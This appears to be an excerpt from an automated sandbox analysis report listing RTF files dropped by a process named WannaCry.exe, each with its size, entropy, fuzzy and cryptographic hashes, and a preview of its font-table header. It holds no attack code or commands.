                                                                              Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f37\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\f40\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                              Category:dropped
                                                                              Size (bytes):37196
                                                                              Entropy (8bit):5.039268541932758
                                                                              Encrypted:false
                                                                              SSDEEP:384:Sw3BHSj2cLeT+sPzy3EFHjHdY2oG2pq32eo75Y3kmA31dv61Qys:Sw3BHSWjHdUG2pq3nZrS14I
                                                                              MD5:3788F91C694DFC48E12417CE93356B0F
                                                                              SHA1:EB3B87F7F654B604DAF3484DA9E02CA6C4EA98B7
                                                                              SHA-256:23E5E738AAD10FB8EF89AA0285269AFF728070080158FD3E7792FE9ED47C51F4
                                                                              SHA-512:B7DD9E6DC7C2D023FF958CAF132F0544C76FAE3B2D8E49753257676CC541735807B4BEFDF483BCAE94C2DCDE3C878C783B4A89DCA0FECBC78F5BBF7C356F35CD
                                                                              Malicious:false
                                                                              Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}..{\f53\fbidi \fmodern\fcharset129\fprq1{\*\panose 020b0609000101010101}\'b1\'bc\'b8\'b2\'c3\'bc;}{\f54\fbidi \fmodern\fcharset129\fprq1{\*\panose 020b0609000101010101}@\'b1\'bc\'b8\'b2\'c3\'bc;}..{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\fhimajor\f31502\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                              Category:dropped
                                                                              Size (bytes):36883
                                                                              Entropy (8bit):5.028048191734335
                                                                              Encrypted:false
                                                                              SSDEEP:384:SheftipUENLFsPzy3EFHjHdR2AG2c/EnByeo75Y3kmA31dv61Qy9:Shef3jHdJG2cQZrS14R
                                                                              MD5:30A200F78498990095B36F574B6E8690
                                                                              SHA1:C4B1B3C087BD12B063E98BCA464CD05F3F7B7882
                                                                              SHA-256:49F2C739E7D9745C0834DC817A71BF6676CCC24A4C28DCDDF8844093AAB3DF07
                                                                              SHA-512:C0DA2AAE82C397F6943A0A7B838F60EEEF8F57192C5F498F2ECF05DB824CFEB6D6CA830BF3715DA7EE400AA8362BD64DC835298F3F0085AE7A744E6E6C690511
                                                                              Malicious:false
                                                                              Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f37\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\f40\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                              Category:dropped
                                                                              Size (bytes):81844
                                                                              Entropy (8bit):4.85025787009624
                                                                              Encrypted:false
                                                                              SSDEEP:384:SXZ0j2cKKwd1lksPzy3EFHjHdI2MG275rQeo75Y3kmA31dv61Qyr:SXZ0qbjHd4G2RNZrS14P
                                                                              MD5:B77E1221F7ECD0B5D696CB66CDA1609E
                                                                              SHA1:51EB7A254A33D05EDF188DED653005DC82DE8A46
                                                                              SHA-256:7E491E7B48D6E34F916624C1CDA9F024E86FCBEC56ACDA35E27FA99D530D017E
                                                                              SHA-512:F435FD67954787E6B87460DB026759410FBD25B2F6EA758118749C113A50192446861A114358443A129BE817020B50F21D27B1EBD3D22C7BE62082E8B45223FC
                                                                              Malicious:false
                                                                              Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}..{\f11\fbidi \fmodern\fcharset128\fprq1{\*\panose 02020609040205080304}MS Mincho{\*\falt ?l?r ??\'81\'66c};}{\f12\fbidi \froman\fcharset129\fprq2{\*\panose 02030600000101010101}\'b9\'d9\'c5\'c1{\*\falt Batang};}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f40\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}..{\f44\fbidi \froman\fcharset129\fprq2{\*\panose 020306000001
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                              Category:dropped
                                                                              Size (bytes):91501
                                                                              Entropy (8bit):4.841830504507431
                                                                              Encrypted:false
                                                                              SSDEEP:768:Shef3jHdUG2NQcbxfSVZiG9jvi3//ZVrMQr7pEKCHSI2DsY78piTDtTa6BxzBwdY:SheiaDq
                                                                              MD5:6735CB43FE44832B061EEB3F5956B099
                                                                              SHA1:D636DAF64D524F81367EA92FDAFA3726C909BEE1
                                                                              SHA-256:552AA0F82F37C9601114974228D4FC54F7434FE3AE7A276EF1AE98A0F608F1D0
                                                                              SHA-512:60272801909DBBA21578B22C49F6B0BA8CD0070F116476FF35B3AC8347B987790E4CC0334724244C4B13415A246E77A577230029E4561AE6F04A598C3F536C7E
                                                                              Malicious:false
                                                                              Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f37\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\f40\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                              Category:dropped
                                                                              Size (bytes):41169
                                                                              Entropy (8bit):5.030695296195755
                                                                              Encrypted:false
                                                                              SSDEEP:384:SheftipUENLFsPzy3EFHjHdcqH24G2ZN1EDCv3Apb0WD5gYV/S4L3rnzdeo75Y3f:Shef3jHdcMG2NpZrS14F
                                                                              MD5:C33AFB4ECC04EE1BCC6975BEA49ABE40
                                                                              SHA1:FBEA4F170507CDE02B839527EF50B7EC74B4821F
                                                                              SHA-256:A0356696877F2D94D645AE2DF6CE6B370BD5C0D6DB3D36DEF44E714525DE0536
                                                                              SHA-512:0D435F0836F61A5FF55B78C02FA47B191E5807A79D8A6E991F3115743DF2141B3DB42BA8BDAD9AD259E12F5800828E9E72D7C94A6A5259312A447D669B03EC44
                                                                              Malicious:false
                                                                              Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f37\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\f40\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                              Category:dropped
                                                                              Size (bytes):37577
                                                                              Entropy (8bit):5.025836823617116
                                                                              Encrypted:false
                                                                              SSDEEP:384:SheftipUENLFsPzy3EFHjHdy2MG2D7mgwroXeo75Y3kmA31dv61Qy5:Shef3jHdGG23KrDZrS14N
                                                                              MD5:FF70CC7C00951084175D12128CE02399
                                                                              SHA1:75AD3B1AD4FB14813882D88E952208C648F1FD18
                                                                              SHA-256:CB5DA96B3DFCF4394713623DBF3831B2A0B8BE63987F563E1C32EDEB74CB6C3A
                                                                              SHA-512:F01DF3256D49325E5EC49FD265AA3F176020C8FFEC60EB1D828C75A3FA18FF8634E1DE824D77DFDD833768ACFF1F547303104620C70066A2708654A07EF22E19
                                                                              Malicious:false
                                                                              Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f37\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\f40\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                              Category:dropped
                                                                              Size (bytes):39896
                                                                              Entropy (8bit):5.048541002474746
                                                                              Encrypted:false
                                                                              SSDEEP:384:SheftipUENLFsPzy3EFHjHdD2SG2gA8w8OJ6868jy8/8w8m8T848f8y858l8j8yv:Shef3jHdxG2KhuZrS14G
                                                                              MD5:E79D7F2833A9C2E2553C7FE04A1B63F4
                                                                              SHA1:3D9F56D2381B8FE16042AA7C4FEB1B33F2BAEBFF
                                                                              SHA-256:519AD66009A6C127400C6C09E079903223BD82ECC18AD71B8E5CD79F5F9C053E
                                                                              SHA-512:E0159C753491CAC7606A7250F332E87BC6B14876BC7A1CF5625FA56AB4F09C485F7B231DD52E4FF0F5F3C29862AFB1124C0EFD0741613EB97A83CBE2668AF5DE
                                                                              Malicious:false
                                                                              Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f37\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\f40\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                              Category:dropped
                                                                              Size (bytes):37917
                                                                              Entropy (8bit):5.027872281764284
                                                                              Encrypted:false
                                                                              SSDEEP:384:SheftipUENLFsPzy3EFHjHdy2QG2xgk5eo75Y3kmA31dv61QyV:Shef3jHdCG2EZrS14p
                                                                              MD5:FA948F7D8DFB21CEDDD6794F2D56B44F
                                                                              SHA1:CA915FBE020CAA88DD776D89632D7866F660FC7A
                                                                              SHA-256:BD9F4B3AEDF4F81F37EC0A028AABCB0E9A900E6B4DE04E9271C8DB81432E2A66
                                                                              SHA-512:0D211BFB0AE953081DCA00CD07F8C908C174FD6C47A8001FADC614203F0E55D9FBB7FA9B87C735D57101341AB36AF443918EE00737ED4C19ACE0A2B85497F41A
                                                                              Malicious:false
                                                                              Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f37\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\f40\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                              Category:dropped
                                                                              Size (bytes):52161
                                                                              Entropy (8bit):4.964306949910696
                                                                              Encrypted:false
                                                                              SSDEEP:768:Shef3jHdXG2Cz2/vBAOZsQO0cLfnF/Zhcz7sDsYZBB/0gBjL+IU/hbhMVDtsR49P:ShehlrGR1m4dx9mjVyAvg7ouDT
                                                                              MD5:313E0ECECD24F4FA1504118A11BC7986
                                                                              SHA1:E1B9AE804C7FB1D27F39DB18DC0647BB04E75E9D
                                                                              SHA-256:70C0F32ED379AE899E5AC975E20BBBACD295CF7CD50C36174D2602420C770AC1
                                                                              SHA-512:C7500363C61BAF8B77FCE796D750F8F5E6886FF0A10F81C3240EA3AD4E5F101B597490DEA8AB6BD9193457D35D8FD579FCE1B88A1C8D85EBE96C66D909630730
                                                                              Malicious:false
                                                                              Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f37\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\f40\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                              Category:dropped
                                                                              Size (bytes):47108
                                                                              Entropy (8bit):4.952777691675008
                                                                              Encrypted:false
                                                                              SSDEEP:384:SheftipUENLFsPzy3EFHjHdg2qG2aUGs0K6lyZqmfGGHRblldORZeo75Y3kmA31L:Shef3jHdeG2lGsDOcZxbP7ZrS14K
                                                                              MD5:452615DB2336D60AF7E2057481E4CAB5
                                                                              SHA1:442E31F6556B3D7DE6EB85FBAC3D2957B7F5EAC6
                                                                              SHA-256:02932052FAFE97E6ACAAF9F391738A3A826F5434B1A013ABBFA7A6C1ADE1E078
                                                                              SHA-512:7613DC329ABE7A3F32164C9A6B660F209A84B774AB9C008BF6503C76255B30EA9A743A6DC49A8DE8DF0BCB9AEA5A33F7408BA27848D9562583FF51991910911F
                                                                              Malicious:false
                                                                              Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f37\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\f40\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                              Category:dropped
                                                                              Size (bytes):41391
                                                                              Entropy (8bit):5.027730966276624
                                                                              Encrypted:false
                                                                              SSDEEP:384:SheftipUENLFsPzy3EFHjHd4Yb2YG2gNZ8a8zV/8j8U8l8x838Z8Q808m8d8T8hw:Shef3jHdZvG23AZrS14f
                                                                              MD5:C911ABA4AB1DA6C28CF86338AB2AB6CC
                                                                              SHA1:FEE0FD58B8EFE76077620D8ABC7500DBFEF7C5B0
                                                                              SHA-256:E64178E339C8E10EAC17A236A67B892D0447EB67B1DCD149763DAD6FD9F72729
                                                                              SHA-512:3491ED285A091A123A1A6D61AAFBB8D5621CCC9E045A237A2F9C2CF6049E7420EB96EF30FDCEA856B50454436E2EC468770F8D585752D73FAFD676C4EF5E800A
                                                                              Malicious:false
                                                                              Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f37\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\f40\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                              Category:dropped
                                                                              Size (bytes):37381
                                                                              Entropy (8bit):5.02443306661187
                                                                              Encrypted:false
                                                                              SSDEEP:384:SheftipUENLFsPzy3EFHjHdf24G2/ezV6YQUdZYlujeMQ9RXmhRweo75Y3kmA31S:Shef3jHdrG2fuhZrS14T
                                                                              MD5:8D61648D34CBA8AE9D1E2A219019ADD1
                                                                              SHA1:2091E42FC17A0CC2F235650F7AAD87ABF8BA22C2
                                                                              SHA-256:72F20024B2F69B45A1391F0A6474E9F6349625CE329F5444AEC7401FE31F8DE1
                                                                              SHA-512:68489C33BA89EDFE2E3AEBAACF8EF848D2EA88DCBEF9609C258662605E02D12CFA4FFDC1D266FC5878488E296D2848B2CB0BBD45F1E86EF959BAB6162D284079
                                                                              Malicious:false
                                                                              Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f37\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\f40\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                              Category:dropped
                                                                              Size (bytes):38483
                                                                              Entropy (8bit):5.022972736625151
                                                                              Encrypted:false
                                                                              SSDEEP:384:SheftipUENLFsPzy3EFHjHdb24G2ZKLVdDeo75Y3kmA31dv61QyE:Shef3jHd/G2w6ZrS14w
                                                                              MD5:C7A19984EB9F37198652EAF2FD1EE25C
                                                                              SHA1:06EAFED025CF8C4D76966BF382AB0C5E1BD6A0AE
                                                                              SHA-256:146F61DB72297C9C0FACFFD560487F8D6A2846ECEC92ECC7DB19C8D618DBC3A4
                                                                              SHA-512:43DD159F9C2EAC147CBFF1DDA83F6A83DD0C59D2D7ACAC35BA8B407A04EC9A1110A6A8737535D060D100EDE1CB75078CF742C383948C9D4037EF459D150F6020
                                                                              Malicious:false
                                                                              Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f37\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\f40\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                              Category:dropped
                                                                              Size (bytes):42582
                                                                              Entropy (8bit):5.010722377068833
                                                                              Encrypted:false
                                                                              SSDEEP:384:SheftipUENLFsPzy3EFHjHds42WG2mzGu/eo75Y3kmA31dv61QyZ:Shef3jHdsiG2moZrS149
